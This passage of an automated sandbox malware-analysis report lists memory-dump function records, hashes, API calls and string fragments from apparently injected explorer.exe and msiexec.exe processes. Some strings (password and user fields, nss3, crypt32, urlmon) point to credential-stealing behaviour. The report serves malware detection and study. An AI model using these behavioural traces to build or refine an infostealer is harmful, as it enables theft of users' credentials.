                                                                  • Opcode Fuzzy Hash: afa6d07527846fbb1122b3884d939f329e186663819791bdf139398d76f10f5b
                                                                  • Instruction Fuzzy Hash: 5031F73261CB4DCFCB29DF18D9859E9B3E0FB85710F04065ED49B87119DB70A942CAD2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  control_flow_graph 306 5aa64ab-5aa64ac 307 5aa64ae-5aa64b1 306->307 308 5aa650d-5aa651a call 5aa8312 306->308 307->308 310 5aa651f-5aa655f call 5aa74f2 308->310 313 5aa6569-5aa6572 310->313 314 5aa6561-5aa6567 SleepEx 310->314 315 5aa6578-5aa6581 313->315 316 5aa64e9-5aa64ed 313->316 314->313 317 5aa65ba-5aa65d6 315->317 318 5aa6583-5aa658a 315->318 316->313 319 5aa64ef-5aa64f2 316->319 320 5aa659f-5aa65a8 318->320 321 5aa658c-5aa658d 318->321 319->313 322 5aa64f4-5aa6514 call 5aa8342 319->322 320->317 325 5aa65aa-5aa65b1 320->325 323 5aa6593-5aa659d 321->323 322->310 328 5aa651a call 5aa8312 322->328 323->320 323->323 325->317 327 5aa65b3-5aa65b4 325->327 327->317 328->310
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.522017147.0000000005A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5a90000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  • Opcode ID: 6b769b170b1a8b9684fe2bf6667aca27b47b5c3d285ca0adb756b6e6030b14e7
                                                                  • Instruction ID: fc03037d94a632e4b6903b6fb144f0b0a99c27adb2b26c0b1b665574fbb478ab
                                                                  • Opcode Fuzzy Hash: 6b769b170b1a8b9684fe2bf6667aca27b47b5c3d285ca0adb756b6e6030b14e7
                                                                  • Instruction Fuzzy Hash: 9221E43261CB498FCB39DF18E9859ED73D1F784710F44066ED5CB87156EB34A8438A86
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.522017147.0000000005A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5a90000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID: CreateThread
                                                                  • String ID:
                                                                  • API String ID: 2422867632-0
                                                                  • Opcode ID: 9fb2356148101aa9420ae4aad7d72730ff3cfb8bd9b520b9a3e7d6278ce6f5f3
                                                                  • Instruction ID: 2fb04dd7c213b2003da0d840fbb10a50007fae95838bb7b01f5407713c20ab56
                                                                  • Opcode Fuzzy Hash: 9fb2356148101aa9420ae4aad7d72730ff3cfb8bd9b520b9a3e7d6278ce6f5f3
                                                                  • Instruction Fuzzy Hash: 8FF08130718A484FDB88EF6CD48496AB3E1EF98200F444A3EA95EC7264EA35C5818752
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.528048889.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_e080000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .dll$32.d$K;y&$M$S$el32$kern$ll$user
                                                                  • API String ID: 0-2102913938
                                                                  • Opcode ID: c967ba98aa6818e9a7e8a5f096327c9b61f3f12a1156fda78f7e771b66dbc61a
                                                                  • Instruction ID: 2235e7e15b5b9efedcbac9d5d13b3a27c6ca2a802cc226257bff3ab2f6ee2442
                                                                  • Opcode Fuzzy Hash: c967ba98aa6818e9a7e8a5f096327c9b61f3f12a1156fda78f7e771b66dbc61a
                                                                  • Instruction Fuzzy Hash: 28E17D70618A499FCB59EF78C494BEAF3E1FF98301F404A2AD15EC7644DF34A9608B85
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.528048889.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_e080000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                  • API String ID: 0-3558027158
                                                                  • Opcode ID: 4a678110c588850d309b12d68528c88ad7d21129bf4e39003a41248f711be8d1
                                                                  • Instruction ID: 9e4bca67a5e41abcdaa655b2cf4502e9736654ff98085f8f98468e0138b5a0cc
                                                                  • Opcode Fuzzy Hash: 4a678110c588850d309b12d68528c88ad7d21129bf4e39003a41248f711be8d1
                                                                  • Instruction Fuzzy Hash: 54914EF04082988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE89558B85
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.528048889.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_e080000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: UR$2$L: $Pass$User$name$word
                                                                  • API String ID: 0-2058692283
                                                                  • Opcode ID: 75c8884196013b17c768361e1995a5fa7aa5762a9df6beb0c95d7ae7f7b5ba93
                                                                  • Instruction ID: 91f4843fc8134f1eaf76b5c55f2f0cafdc85db5c3b3d285e3c2450b5d9c2660e
                                                                  • Opcode Fuzzy Hash: 75c8884196013b17c768361e1995a5fa7aa5762a9df6beb0c95d7ae7f7b5ba93
                                                                  • Instruction Fuzzy Hash: 5591BE70A18748CBDB18EFA8D4446EEB7F2FF98300F404A2ED58AD7251DF7089958789
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.528048889.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_e080000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: U$b$d$k$n$o
                                                                  • API String ID: 0-1739295752
                                                                  • Opcode ID: c154e42e4e2377762541633edb31a1727a8ce2a1e2ea00f45db5444f4b9afd32
                                                                  • Instruction ID: ed611fa555c12fdf87f9c2ad196aabf7043f8aa7a7c85737c6225912ab9c79bc
                                                                  • Opcode Fuzzy Hash: c154e42e4e2377762541633edb31a1727a8ce2a1e2ea00f45db5444f4b9afd32
                                                                  • Instruction Fuzzy Hash: CB516E30A14A0D9BCB48EFA4D8847EEB3E1FF54301F408629C55AD7251EF34AA648BD6
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.528048889.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_e080000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .dll$cryp$dll$nss3$t32.
                                                                  • API String ID: 0-1478216402
                                                                  • Opcode ID: ed6325d0aff5055827ada73a612b01221855a1ddf8e9fb96a19483f3db3cb0e3
                                                                  • Instruction ID: 75fca8f35f0dde185a9f2cd9527c54266f3c9443f7917e982e9671c103b35f96
                                                                  • Opcode Fuzzy Hash: ed6325d0aff5055827ada73a612b01221855a1ddf8e9fb96a19483f3db3cb0e3
                                                                  • Instruction Fuzzy Hash: 9C615D30618B09CFDB58EF68C0587DAB7E2FF58300F40462AD91AC76A4DB74A964C7C5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.528048889.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_e080000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .dll$cryp$dll$nss3$t32.
                                                                  • API String ID: 0-1478216402
                                                                  • Opcode ID: a6cf1db3b2cf44addb77c6c3145e795bac18999a885706ce33a387fa702dbb64
                                                                  • Instruction ID: 6b348f926dede32a53fd44b8323a56b647f408ec62b9b69446dd56b44825a354
                                                                  • Opcode Fuzzy Hash: a6cf1db3b2cf44addb77c6c3145e795bac18999a885706ce33a387fa702dbb64
                                                                  • Instruction Fuzzy Hash: 5F615C30618B09CFDB58EF68C0587DAB7E2FF58300F40862AD51AC7694DB74A964C7C5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.528048889.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_e080000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 2.dl$dll$l32.$ole3$shel
                                                                  • API String ID: 0-1970020201
                                                                  • Opcode ID: 7312c44d1f0932142c55cb86490c7abd72f0b28439fd4d223315acbb67dd2d0a
                                                                  • Instruction ID: 0e1292515c2e0dd0bbc18b5f651da8d250849ce5bdb48f685ae2f4638802e462
                                                                  • Opcode Fuzzy Hash: 7312c44d1f0932142c55cb86490c7abd72f0b28439fd4d223315acbb67dd2d0a
                                                                  • Instruction Fuzzy Hash: 84617B70A14B488FCB54EFA4D044AEEB7F1FF58300F404A2ED89AE7614EF3099519B86
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.528048889.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_e080000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 2.dl$dll$l32.$ole3$shel
                                                                  • API String ID: 0-1970020201
                                                                  • Opcode ID: 5a3df0026cc56c1644cef290c070b6d3b80a5a80f5bc76ad6d38711de2aa5d2b
                                                                  • Instruction ID: 2e30899455a7365a60d4641206c87719b9f823a433c0cb9ef2bd8f1daf82d3cf
                                                                  • Opcode Fuzzy Hash: 5a3df0026cc56c1644cef290c070b6d3b80a5a80f5bc76ad6d38711de2aa5d2b
                                                                  • Instruction Fuzzy Hash: 80616B70A14B488FDB54EFA4D0446EEB7F1FF58300F404A2ED89AE7654EF3099519B86
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.528048889.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_e080000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: -Age$User$nt: $on.d$urlm
                                                                  • API String ID: 0-1987325725
                                                                  • Opcode ID: 82b5596553276f9d6d4a4b9897a76d65b4f726d8346adaa5332a8f3f849bdd4c
                                                                  • Instruction ID: c597667daa9a9ac3b35e857d759b0ae72107708023c535490235f1653440aa17
                                                                  • Opcode Fuzzy Hash: 82b5596553276f9d6d4a4b9897a76d65b4f726d8346adaa5332a8f3f849bdd4c
                                                                  • Instruction Fuzzy Hash: 1A31F131B10A4C8FCF44EFA8D8942EEB7E1FF98645F40462AD54ED7240EF788A448785
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.528048889.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_e080000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .dll$el32$h$kern
                                                                  • API String ID: 0-4264704552
                                                                  • Opcode ID: fe29a7bb7e7f92cd852e6a8374585ad37a329447348795b15412dffb0aea7bb3
                                                                  • Instruction ID: 86e0083f4755f19689e73ac2371498dc43d98c75e2e25e33dbdc54f08b257592
                                                                  • Opcode Fuzzy Hash: fe29a7bb7e7f92cd852e6a8374585ad37a329447348795b15412dffb0aea7bb3
                                                                  • Instruction Fuzzy Hash: 69418270608B488FD7A8DF68C4943AAB7E1FB98301F144A3ED59AC3655DF70C995CB41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Execution Graph

                                                                  Execution Coverage:7.6%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:2.1%
                                                                  Total number of Nodes:1087
                                                                  Total number of Limit Nodes:133
31145 63c890 2 API calls 31143->31145 31319 635220 CoInitialize 31144->31319 31147 63578f 31145->31147 31147->31055 31148 6357a9 31321 63c5a0 31148->31321 31150 635822 31151 63c890 2 API calls 31150->31151 31152 63582c 31151->31152 31154 63e300 2 API calls 31152->31154 31154->31133 31155 6357c7 31155->31150 31156 63c5a0 LdrLoadDll 31155->31156 31324 635150 LdrLoadDll RtlFreeHeap 31155->31324 31156->31155 31158 632388 31157->31158 31159 63e3e0 LdrLoadDll 31158->31159 31161 6323e8 31159->31161 31160 6323f1 31160->31057 31161->31160 31325 6317c0 31161->31325 31163 63241a 31173 63243a 31163->31173 31355 631ad0 LdrLoadDll 31163->31355 31165 632428 31165->31173 31356 6320e0 9 API calls 31165->31356 31167 63244c 31358 6340c0 10 API calls 31167->31358 31170 632472 31174 6317c0 10 API calls 31170->31174 31172 632458 31172->31170 31359 62b2b0 LdrLoadDll 31172->31359 31173->31172 31357 6340c0 10 API calls 31173->31357 31175 63249f 31174->31175 31176 6324c0 31175->31176 31360 631ad0 LdrLoadDll 31175->31360 31177 6324de 31176->31177 31362 6340c0 10 API calls 31176->31362 31181 6324f8 31177->31181 31364 62b2b0 LdrLoadDll 31177->31364 31179 6324ae 31179->31176 31361 6320e0 9 API calls 31179->31361 31184 63e300 2 API calls 31181->31184 31182 6324d2 31363 6340c0 10 API calls 31182->31363 31185 632502 31184->31185 31185->31057 31189 6345e6 31188->31189 31190 62b4b0 LdrLoadDll 31189->31190 31192 634615 31190->31192 31191 634641 31380 62e790 31191->31380 31192->31191 31193 62b4b0 LdrLoadDll 31192->31193 31193->31191 31195 634725 31196 62de55 31195->31196 31385 6342d0 31195->31385 31198 635860 31196->31198 31199 6345c0 10 API calls 31198->31199 31200 62de5b 31199->31200 31201 6332e0 31200->31201 31202 633302 31201->31202 31203 62b4b0 LdrLoadDll 31202->31203 31204 6334cd 31203->31204 31205 62b4b0 LdrLoadDll 31204->31205 31206 6334de 31205->31206 31207 62b380 LdrLoadDll 31206->31207 31208 6334f5 31207->31208 31465 6331a0 31208->31465 31211 6331a0 12 API calls 31212 633568 31211->31212 
31213 6331a0 12 API calls 31212->31213 31214 633580 31213->31214 31215 6331a0 12 API calls 31214->31215 31216 633598 31215->31216 31217 6331a0 12 API calls 31216->31217 31218 6335b0 31217->31218 31219 6331a0 12 API calls 31218->31219 31221 6335cb 31219->31221 31220 6335e5 31220->31063 31221->31220 31222 6331a0 12 API calls 31221->31222 31223 633619 31222->31223 31224 6331a0 12 API calls 31223->31224 31225 633656 31224->31225 31226 6331a0 12 API calls 31225->31226 31227 633693 31226->31227 31228 6331a0 12 API calls 31227->31228 31229 6336d0 31228->31229 31230 6331a0 12 API calls 31229->31230 31231 63370d 31230->31231 31231->31063 31233 635dcd 31232->31233 31234 62b160 LdrLoadDll 31233->31234 31235 635de8 31234->31235 31236 637780 LdrLoadDll 31235->31236 31253 635fec 31235->31253 31237 635e18 31236->31237 31238 637780 LdrLoadDll 31237->31238 31239 635e31 31238->31239 31240 637780 LdrLoadDll 31239->31240 31241 635e4a 31240->31241 31242 637780 LdrLoadDll 31241->31242 31243 635e66 31242->31243 31244 637780 LdrLoadDll 31243->31244 31245 635e7f 31244->31245 31246 637780 LdrLoadDll 31245->31246 31247 635e98 31246->31247 31248 637780 LdrLoadDll 31247->31248 31249 635eb4 31248->31249 31250 637780 LdrLoadDll 31249->31250 31251 635ecd 31250->31251 31252 637780 LdrLoadDll 31251->31252 31254 635ee5 31252->31254 31253->31065 31254->31253 31480 6359a0 LdrLoadDll 31254->31480 31257 62fcb6 31256->31257 31260 62fcc1 31256->31260 31258 63e3e0 LdrLoadDll 31257->31258 31258->31260 31259 62fcd7 31259->31067 31260->31259 31261 637780 LdrLoadDll 31260->31261 31262 62fdbc GetFileAttributesW 31260->31262 31263 62ff3f 31260->31263 31267 62b4b0 LdrLoadDll 31260->31267 31268 633720 9 API calls 31260->31268 31481 63aa90 31260->31481 31485 63a920 9 API calls 31260->31485 31486 63a7c0 9 API calls 31260->31486 31261->31260 31262->31260 31264 63e300 2 API calls 31263->31264 31265 62ff58 31263->31265 31264->31265 31265->31067 31267->31260 31268->31260 31487 630cc0 31271->31487 31273 630f4d 31508 
6309a0 31273->31508 31275 62de91 31275->30959 31277 62cdd5 31276->31277 31284 63c490 31277->31284 31280->31106 31281->31112 31282->31116 31283->31120 31285 63d3d0 LdrLoadDll 31284->31285 31286 63c4ac 31285->31286 31289 45596d0 LdrInitializeThunk 31286->31289 31287 62ce49 31287->31107 31289->31287 31291 63534c 31290->31291 31292 62b160 LdrLoadDll 31291->31292 31294 635367 31292->31294 31293 635370 31293->31139 31294->31293 31295 637780 LdrLoadDll 31294->31295 31296 63538d 31295->31296 31297 637780 LdrLoadDll 31296->31297 31298 6353a8 31297->31298 31299 637780 LdrLoadDll 31298->31299 31300 6353c1 31299->31300 31301 637780 LdrLoadDll 31300->31301 31302 6353dd 31301->31302 31303 637780 LdrLoadDll 31302->31303 31304 6353f6 31303->31304 31305 637780 LdrLoadDll 31304->31305 31306 63540f 31305->31306 31307 62b160 LdrLoadDll 31306->31307 31309 63543b 31307->31309 31308 6354e9 31308->31139 31309->31308 31310 637780 LdrLoadDll 31309->31310 31311 63545f 31310->31311 31312 62b160 LdrLoadDll 31311->31312 31313 635494 31312->31313 31313->31308 31314 637780 LdrLoadDll 31313->31314 31315 6354b7 31314->31315 31316 637780 LdrLoadDll 31315->31316 31317 6354d0 31316->31317 31318 637780 LdrLoadDll 31317->31318 31318->31308 31320 635285 31319->31320 31320->31148 31322 63d3d0 LdrLoadDll 31321->31322 31323 63c5bc 31322->31323 31323->31155 31324->31155 31326 631858 31325->31326 31327 62b4b0 LdrLoadDll 31326->31327 31328 6318f6 31327->31328 31329 62b4b0 LdrLoadDll 31328->31329 31330 631911 31329->31330 31331 62cdb0 2 API calls 31330->31331 31332 631936 31331->31332 31333 631a7d 31332->31333 31377 63c520 LdrLoadDll 31332->31377 31334 631a8e 31333->31334 31365 631180 31333->31365 31334->31163 31337 631964 31338 631a73 31337->31338 31340 63196f 31337->31340 31339 63c890 2 API calls 31338->31339 31339->31333 31341 63c890 2 API calls 31340->31341 31342 6319a9 31341->31342 31378 63e4c0 LdrLoadDll 31342->31378 31344 6319df 31344->31334 31345 62cdb0 2 API calls 31344->31345 31346 631a05 31345->31346 
31346->31334 31379 63c520 LdrLoadDll 31346->31379 31348 631a2a 31349 631a31 31348->31349 31350 631a5d 31348->31350 31351 63c890 2 API calls 31349->31351 31352 63c890 2 API calls 31350->31352 31353 631a3b 31351->31353 31354 631a67 31352->31354 31353->31163 31354->31163 31355->31165 31356->31173 31357->31167 31358->31172 31359->31170 31360->31179 31361->31176 31362->31182 31363->31177 31364->31181 31366 6311a5 31365->31366 31367 62b4b0 LdrLoadDll 31366->31367 31368 631260 31367->31368 31369 62b4b0 LdrLoadDll 31368->31369 31370 631284 31369->31370 31371 637370 9 API calls 31370->31371 31373 6312d7 31371->31373 31372 631391 31372->31334 31373->31372 31374 62b4b0 LdrLoadDll 31373->31374 31375 63133e 31374->31375 31376 637370 9 API calls 31375->31376 31376->31372 31377->31337 31378->31344 31379->31348 31381 62e7af 31380->31381 31382 637780 LdrLoadDll 31380->31382 31383 62e7b6 GetFileAttributesW 31381->31383 31384 62e7c1 31381->31384 31382->31381 31383->31384 31384->31195 31409 63abf0 31385->31409 31387 63433b 31387->31195 31388 6342e6 31388->31387 31389 634347 31388->31389 31390 634305 31388->31390 31393 62b4b0 LdrLoadDll 31389->31393 31391 63432a 31390->31391 31392 63430d 31390->31392 31395 63e300 2 API calls 31391->31395 31394 63e300 2 API calls 31392->31394 31396 634358 31393->31396 31397 63431e 31394->31397 31395->31387 31398 637370 9 API calls 31396->31398 31397->31195 31399 63436f 31398->31399 31449 633720 31399->31449 31401 63437a 31402 634392 31401->31402 31403 634478 31401->31403 31406 63445f 31402->31406 31459 633cb0 9 API calls 31402->31459 31403->31406 31460 633cb0 9 API calls 31403->31460 31404 63e300 2 API calls 31405 634583 31404->31405 31405->31195 31406->31404 31410 63abfe 31409->31410 31411 63ac05 31409->31411 31410->31388 31412 62b160 LdrLoadDll 31411->31412 31413 63ac37 31412->31413 31416 63ac46 31413->31416 31461 63a6e0 LdrLoadDll 31413->31461 31415 63e3e0 LdrLoadDll 31417 63ac5f 31415->31417 31416->31415 31418 63ae29 31416->31418 31417->31418 31419 
63ac74 31417->31419 31420 63add8 31417->31420 31418->31388 31462 633800 LdrLoadDll 31419->31462 31421 63ade2 31420->31421 31422 63ae7b 31420->31422 31463 633800 LdrLoadDll 31421->31463 31425 63e300 2 API calls 31422->31425 31425->31418 31426 63ac8b 31430 637780 LdrLoadDll 31426->31430 31427 63adf9 31464 63a010 LdrLoadDll 31427->31464 31429 63ae0f 31432 637780 LdrLoadDll 31429->31432 31431 63aca7 31430->31431 31433 637780 LdrLoadDll 31431->31433 31432->31418 31434 63acc3 31433->31434 31435 637780 LdrLoadDll 31434->31435 31436 63ace2 31435->31436 31437 637780 LdrLoadDll 31436->31437 31438 63acfe 31437->31438 31439 637780 LdrLoadDll 31438->31439 31440 63ad1a 31439->31440 31441 637780 LdrLoadDll 31440->31441 31442 63ad39 31441->31442 31443 637780 LdrLoadDll 31442->31443 31444 63ad55 31443->31444 31445 637780 LdrLoadDll 31444->31445 31446 63ad78 31445->31446 31446->31418 31447 63e300 2 API calls 31446->31447 31448 63adcc 31447->31448 31448->31388 31450 637370 9 API calls 31449->31450 31451 633736 31450->31451 31452 633743 31451->31452 31453 637370 9 API calls 31451->31453 31452->31401 31454 633754 31453->31454 31454->31452 31455 637370 9 API calls 31454->31455 31456 63376f 31455->31456 31457 63e300 2 API calls 31456->31457 31458 63377c 31457->31458 31458->31401 31459->31402 31460->31403 31461->31416 31462->31426 31463->31427 31464->31429 31466 6331c9 31465->31466 31467 637780 LdrLoadDll 31466->31467 31468 633206 31467->31468 31469 637780 LdrLoadDll 31468->31469 31470 633224 31469->31470 31471 637780 LdrLoadDll 31470->31471 31473 633246 31471->31473 31472 6332cc 31472->31211 31473->31472 31474 633270 FindFirstFileW 31473->31474 31474->31472 31478 63328b 31474->31478 31475 6332b3 FindNextFileW 31477 6332c5 FindClose 31475->31477 31475->31478 31477->31472 31478->31475 31479 633080 12 API calls 31478->31479 31479->31478 31480->31254 31482 63aaa6 31481->31482 31484 63aba6 31481->31484 31483 637370 9 API calls 31482->31483 31482->31484 31483->31482 31484->31260 31485->31260 
31486->31260 31488 630ce5 31487->31488 31489 62b4b0 LdrLoadDll 31488->31489 31490 630d4a 31489->31490 31491 62b4b0 LdrLoadDll 31490->31491 31492 630d98 31491->31492 31493 62e790 2 API calls 31492->31493 31494 630ddf 31493->31494 31495 630de6 31494->31495 31496 63abf0 2 API calls 31494->31496 31495->31273 31498 630df4 31496->31498 31497 630dfd 31497->31273 31498->31497 31499 62b4b0 LdrLoadDll 31498->31499 31501 630e4c 31499->31501 31500 63aa90 9 API calls 31500->31501 31501->31500 31503 630ed1 31501->31503 31521 630400 31501->31521 31505 630f29 31503->31505 31532 630760 31503->31532 31506 63e300 2 API calls 31505->31506 31507 630f30 31506->31507 31507->31273 31509 6309b6 31508->31509 31512 6309c1 31508->31512 31510 63e3e0 LdrLoadDll 31509->31510 31510->31512 31511 6309d7 31511->31275 31512->31511 31513 62e790 2 API calls 31512->31513 31514 630c90 31512->31514 31517 63aa90 9 API calls 31512->31517 31518 630400 9 API calls 31512->31518 31519 62b4b0 LdrLoadDll 31512->31519 31520 630760 9 API calls 31512->31520 31513->31512 31515 63e300 2 API calls 31514->31515 31516 630ca9 31514->31516 31515->31516 31516->31275 31517->31512 31518->31512 31519->31512 31520->31512 31522 630426 31521->31522 31523 637370 9 API calls 31522->31523 31524 630482 31523->31524 31525 633720 9 API calls 31524->31525 31526 63048d 31525->31526 31528 630610 31526->31528 31529 6304ab 31526->31529 31527 6305f5 31527->31501 31528->31527 31530 6302d0 9 API calls 31528->31530 31529->31527 31538 6302d0 31529->31538 31530->31528 31533 630786 31532->31533 31534 637370 9 API calls 31533->31534 31535 6307f7 31534->31535 31536 633720 9 API calls 31535->31536 31537 630802 31536->31537 31537->31503 31539 6302e6 31538->31539 31542 633b90 31539->31542 31541 6303ee 31541->31529 31544 633bcd 31542->31544 31543 633c7d 31543->31541 31544->31543 31546 633c20 31544->31546 31549 634b70 31544->31549 31547 633c59 31546->31547 31548 63e300 2 API calls 31546->31548 31547->31541 31548->31547 31550 6348b0 9 API calls 
31549->31550 31551 634b84 31550->31551 31551->31546 31552->31075 31553->31086 31554->31084 31555->31089 31556 63b4b0 31557 63e280 LdrLoadDll 31556->31557 31559 63b4eb 31556->31559 31557->31559 31558 63b5e6 31559->31558 31560 62b160 LdrLoadDll 31559->31560 31561 63b52b 31560->31561 31562 637780 LdrLoadDll 31561->31562 31564 63b550 31562->31564 31563 63b560 Sleep 31563->31564 31564->31558 31564->31563 31567 63b120 LdrLoadDll 31564->31567 31568 63b300 LdrLoadDll 31564->31568 31567->31564 31568->31564 31570 4559540 LdrInitializeThunk 31572 62eb9e 31573 62eba3 31572->31573 31575 62eb8f 31572->31575 31574 637370 9 API calls 31573->31574 31574->31575
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,00000000), ref: 00633281
                                                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 006332BE
                                                                  • FindClose.KERNEL32(?), ref: 006332C9
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Find$File$CloseFirstNext
                                                                  • String ID:
                                                                  • API String ID: 3541575487-0
                                                                  • Opcode ID: dc9b3bc0544ac893b94b9d92acb10c5a0b8d29a133be0aed039d4294c39566b2
                                                                  • Instruction ID: 2b6c9cb0e04b4cafb26311b4d88bba0bbde00658c800083b839f3acf193768c8
                                                                  • Opcode Fuzzy Hash: dc9b3bc0544ac893b94b9d92acb10c5a0b8d29a133be0aed039d4294c39566b2
                                                                  • Instruction Fuzzy Hash: B83163B1900359BBEB60DBA4CC85FEF777DEB44704F14455CF908A6281DA70AB858BE4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorMode
                                                                  • String ID: 7$G{@1
                                                                  • API String ID: 2340568224-1664923512
                                                                  • Opcode ID: 6c18a8c6cfb000065923d4a3a27eed131083a93229235b6252260cc53b68182a
                                                                  • Instruction ID: 9565480315472788cb25669cbe64dfee3874174b7b9f2b31fd8b8f0daa51b0a7
                                                                  • Opcode Fuzzy Hash: 6c18a8c6cfb000065923d4a3a27eed131083a93229235b6252260cc53b68182a
                                                                  • Instruction Fuzzy Hash: 05A1A3B1D00618ABDB64DFA4DC41FEEB7BAAF44304F10855DF519A7241EB30AA448FA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorMode
                                                                  • String ID: 7$G{@1
                                                                  • API String ID: 2340568224-1664923512
                                                                  • Opcode ID: 27a0d2e490c4a32b142170ce0af58cbeab771d6cf10b9e9e436b234a07047c1a
                                                                  • Instruction ID: 143b85727cf12abe89c0b810afbf0a67de004d35b1dd251903703904ab654622
